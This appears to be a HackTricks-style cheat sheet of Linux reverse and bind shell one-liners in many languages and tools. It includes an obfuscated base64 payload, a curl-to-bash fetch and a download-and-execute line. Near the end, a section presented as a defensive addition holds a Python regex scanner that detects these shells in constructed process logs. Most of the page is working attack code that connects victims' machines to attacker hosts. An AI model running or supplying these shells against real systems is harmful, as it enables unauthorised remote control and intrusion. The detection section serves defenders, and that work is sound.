Shells - Linux
If you have questions about any of these shells, you can check them with https://explainshell.com/

Full TTY

Once you get a reverse shell read this page to obtain a full TTY.

Bash | sh

curl http://reverse-shell.sh/1.1.1.1:3000 | bash
bash -i >& /dev/tcp/<ATTACKER-IP>/<PORT> 0>&1
sh -i >& /dev/udp/127.0.0.1/4242 0>&1 #UDP
0<&196;exec 196<>/dev/tcp/<ATTACKER-IP>/<PORT>; sh <&196 >&196 2>&196
exec 5<>/dev/tcp/<ATTACKER-IP>/<PORT>; while read line 0<&5; do $line 2>&5 >&5; done
#Short and bypass (credits to Dikline)
(sh)0>/dev/tcp/10.10.10.10/9091
#after getting the previous shell, to get the output execute
exec >&0
Don't forget to try the other shells as well: sh, ash, bsh, csh, ksh, zsh, pdksh, tcsh, bash

Symbol safe shell

#If you need a more stable connection do:
bash -c 'bash -i >& /dev/tcp/<ATTACKER-IP>/<PORT> 0>&1'

#Stealthier method
#B64 encode the shell like: echo "nohup bash -c 'bash -i >& /dev/tcp/10.8.4.185/4444 0>&1'" | base64 -w0
echo bm9odXAgYmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjQuMTg1LzQ0NDQgMD4mMScK | base64 -d | bash 2>/dev/null

Create in file and execute

echo -e '#!/bin/bash\nbash -i >& /dev/tcp/<ATTACKER-IP>/<PORT> 0>&1' > /tmp/sh.sh; bash /tmp/sh.sh;
wget http://<IP attacker>/shell.sh -P /tmp; chmod +x /tmp/shell.sh; /tmp/shell.sh

Netcat

nc -e /bin/sh <ATTACKER-IP> <PORT>
nc <ATTACKER-IP> <PORT> | /bin/sh #Blind
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ATTACKER-IP> <PORT> >/tmp/f
nc <ATTACKER-IP> <PORT1>| /bin/bash | nc <ATTACKER-IP> <PORT2>
rm -f /tmp/bkpipe;mknod /tmp/bkpipe p;/bin/sh 0</tmp/bkpipe | nc <ATTACKER-IP> <PORT> 1>/tmp/bkpipe

Telnet

telnet <ATTACKER-IP> <PORT> | /bin/sh #Blind
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|telnet <ATTACKER-IP> <PORT> >/tmp/f
telnet <ATTACKER-IP> <PORT1> | /bin/bash | telnet <ATTACKER-IP> <PORT2> #Two listeners: one receives commands, the other the output
rm -f /tmp/bkpipe;mknod /tmp/bkpipe p;/bin/sh 0</tmp/bkpipe | telnet <ATTACKER-IP> <PORT> 1>/tmp/bkpipe

Whois

Attacker
while true; do nc -l <port>; done
To send a command, type it, press Enter and then press CTRL+D (to close STDIN).
Victim
export X=Connected; while true; do X=`eval $(whois -h <IP> -p <Port> "Output: $X")`; sleep 1; done

Python

#Linux
export RHOST="127.0.0.1";export RPORT=12345;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
#IPv6
python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",4343,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");'

Perl

perl -e 'use Socket;$i="<ATTACKER-IP>";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Ruby

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

PHP

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
<?php exec("/bin/bash -c 'bash -i >/dev/tcp/10.10.14.8/4444 0>&1'"); ?>

Java

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Ncat

victim> ncat --exec cmd.exe --allow 10.0.0.4 -vnl 4444 --ssl
attacker> ncat -v 10.0.0.22 4444 --ssl

Golang

echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","192.168.0.134:8080");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go

Lua

#Linux
lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"
#Windows & Linux (the inner quotes must be double quotes, or the single-quoted shell argument ends early)
lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, "r") local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'

NodeJS

(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/sh", []);
    var client = new net.Socket();
    client.connect(8080, "10.17.26.64", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // Prevents the Node.js application from crashing
})();

or

require('child_process').exec('nc -e /bin/sh [IPADDR] [PORT]')
require('child_process').exec("bash -c 'bash -i >& /dev/tcp/10.10.14.2/6767 0>&1'")

or

var x = global.process.mainModule.require
x('child_process').exec('nc [IPADDR] [PORT] -e /bin/bash')

or

https://gitlab.com/0x4ndr3/blog/blob/master/JSgen/JSgen.py

OpenSSL

Attacker (Kali)
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Generate certificate
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port> #Here you will be able to introduce the commands
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port2> #Here you will be able to get the response
Victim
#Linux
openssl s_client -quiet -connect <ATTACKER_IP>:<PORT1>|/bin/bash|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>

#Windows
openssl.exe s_client -quiet -connect <ATTACKER_IP>:<PORT1>|cmd.exe|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>

Socat

Bind shell

victim> socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane
attacker> socat FILE:`tty`,raw,echo=0 TCP:<victim_ip>:1337

Reverse shell

attacker> socat TCP-LISTEN:1337,reuseaddr FILE:`tty`,raw,echo=0
victim> socat TCP4:<attackers_ip>:1337 EXEC:bash,pty,stderr,setsid,sigint,sane

Awk

awk 'BEGIN {s = "/inet/tcp/0/<IP>/<PORT>"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null

Finger

Attacker
while true; do nc -l 79; done
To send a command, type it, press Enter and then press CTRL+D (to close STDIN).
Victim
export X=Connected; while true; do X=`eval $(finger "$X"@<IP> 2> /dev/null)`; sleep 1; done

export X=Connected; while true; do X=`eval $(finger "$X"@<IP> 2> /dev/null | grep '!'|sed 's/^!//')`; sleep 1; done

Gawk

#!/usr/bin/gawk -f

BEGIN {
    Port = 8080
    Prompt = "bkd> "

    Service = "/inet/tcp/" Port "/0/0"
    while (1) {
        do {
            printf Prompt |& Service
            Service |& getline cmd
            if (cmd) {
                while ((cmd |& getline) > 0)
                    print $0 |& Service
                close(cmd)
            }
        } while (cmd != "exit")
        close(Service)
    }
}

Xterm

One of the simplest forms of reverse shell is an xterm session. The following command should be run on the server. It will try to connect back to you (10.0.0.1) on TCP port 6001.
xterm -display 10.0.0.1:1
To catch the incoming xterm, start an X-Server (:1 – which listens on TCP port 6001). One way to do this is with Xnest (to be run on your system):
Xnest :1
You’ll need to authorise the target to connect to you (command also run on your host):
xhost +targetip

Groovy

By frohoff. NOTE: the Java reverse shell also works for Groovy.
String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()){
    while(pi.available()>0)so.write(pi.read());
    while(pe.available()>0)so.write(pe.read());
    while(si.available()>0)po.write(si.read());
    so.flush();po.flush();Thread.sleep(50);
    try {p.exitValue();break;}catch (Exception e){}
};
p.destroy();s.close();
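A defender-side counterpart, added here and not part of the HackTricks page: a small Python scanner that flags process command lines matching the shell primitives catalogued above (/dev/tcp redirection, nc -e / ncat --exec, mkfifo-to-nc pipelines, socat EXEC:, and interpreter one-liners that dup2() a socket onto the standard descriptors). The "pid=... user=... cmd=..." record format and the sample records are constructed for this example and stand in for auditd EXECVE or EDR process telemetry.

```python
import re

# Regexes for the reverse/bind shell primitives catalogued on this page:
# bash /dev/tcp (or /dev/udp) redirection, nc/ncat -e or --exec, mkfifo|nc style
# pipelines, socat EXEC:, and interpreter one-liners that dup2() a socket onto
# fds 0-2 before spawning a shell. Iteration order of this dict fixes hit order.
PATTERNS = {
    "bash_dev_tcp": re.compile(r"/dev/(tcp|udp)/[\w.:\-]+/\d+"),
    "nc_exec": re.compile(r"\b(nc|ncat|netcat)\b[^|;]*\s(-[a-zA-Z]*e|--exec)\s"),
    "fifo_pipe_shell": re.compile(r"\b(mkfifo|mknod)\s+\S+.*\|\s*(nc|ncat|telnet|openssl)\b"),
    "socat_exec": re.compile(r"\bsocat\b.*\bEXEC:"),
    "interp_dup2": re.compile(r"socket\.socket\(.*dup2\(.*(pty\.spawn|subprocess|/bin/sh)"),
}

def classify(cmdline):
    """Return the names of every pattern that matches one command line."""
    return [name for name, rx in PATTERNS.items() if rx.search(cmdline)]

# Constructed process-creation records (not taken from any real system); the
# "pid=<n> user=<name> cmd=<argv joined>" layout is a stand-in for auditd/EDR data.
SAMPLE_LOG = """
pid=4021 user=www-data cmd=bash -i >& /dev/tcp/10.0.0.5/4444 0>&1
pid=4022 user=www-data cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.5 4444 >/tmp/f
pid=4023 user=root cmd=nc -lvnp 8080
pid=4024 user=jenkins cmd=python -c 'import socket,os,pty;s=socket.socket();s.connect(("10.0.0.5",1234));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
pid=4025 user=alice cmd=socat TCP4:10.0.0.5:1337 EXEC:bash,pty,stderr,setsid,sigint,sane
pid=4026 user=alice cmd=ls -la /tmp
""".strip().splitlines()

RECORD = re.compile(r"pid=(\d+) user=(\S+) cmd=(.*)")

def scan(log_lines):
    """Return (pid, user, matched_patterns) for every record that trips a pattern."""
    findings = []
    for line in log_lines:
        m = RECORD.match(line)
        if not m:
            continue  # skip malformed records instead of aborting the whole scan
        hits = classify(m.group(3))
        if hits:
            findings.append((int(m.group(1)), m.group(2), hits))
    return findings

if __name__ == "__main__":
    # pid 4023 (a plain listener) and pid 4026 (ls) are expected not to appear.
    for pid, user, hits in scan(SAMPLE_LOG):
        print(f"pid={pid} user={user} -> {', '.join(hits)}")
```

The regexes are indicators, not proof: a plain `nc -l` listener is deliberately left unflagged, and the `interp_dup2` rule should be extended with the Perl, Ruby and PHP shapes shown above before it is used on real telemetry.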

Bibliography

Reverse Shell Cheat Sheet (pentestmonkey.net): http://pentestmonkey.net/cheat-sheet/shells/reverse-shell
Using Whois and Finger for Reverse Shells
PayloadsAllTheThings/Reverse Shell Cheatsheet.md at master · swisskyrepo/PayloadsAllTheThings (GitHub)